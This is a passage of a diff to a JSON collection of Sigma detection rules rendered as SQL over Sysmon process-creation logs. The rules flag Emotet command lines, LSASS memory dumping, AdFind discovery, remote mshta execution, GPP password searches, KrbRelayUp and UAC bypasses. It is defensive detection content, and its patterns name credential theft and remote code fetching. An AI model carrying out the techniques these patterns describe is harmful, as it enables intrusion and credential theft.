LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' 